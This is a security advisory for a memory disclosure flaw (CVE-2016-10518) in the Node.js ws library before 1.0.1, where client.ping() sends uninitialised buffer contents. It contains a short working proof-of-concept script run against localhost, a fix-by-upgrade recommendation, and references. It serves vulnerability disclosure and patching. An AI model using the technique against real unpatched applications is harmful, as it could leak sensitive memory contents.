Versions of ws prior to 1.0.1 are affected by a remote memory disclosure vulnerability.

In certain rare circumstances, applications which allow users to control the arguments of a client.ping() call will cause ws to send the contents of an allocated but non-zero-filled buffer to the server. This may disclose sensitive information that still exists in memory after previous use of the memory for other tasks.

Proof of Concept

var ws = require('ws')

var server = new ws.Server({ port: 9000 })
var client = new ws('ws://localhost:9000')

client.on('open', function () {
  console.log('open')
  client.ping(50) // this sends a non-zeroed buffer of 50 bytes

  client.on('pong', function (data) {
    console.log('got pong')
    console.log(data) // Data from the client. 
  })
})

Recommendation

Update to version 1.0.1 or greater.

References

• https://nvd.nist.gov/vuln/detail/CVE-2016-10518
• https://gist.github.com/c0nrad/e92005446c480707a74a
• GHSA-2mhh-w6q8-5hxw
• https://github.com/websockets/ws/releases/tag/1.0.1
• https://www.npmjs.com/advisories/67
• websockets/ws@29293ed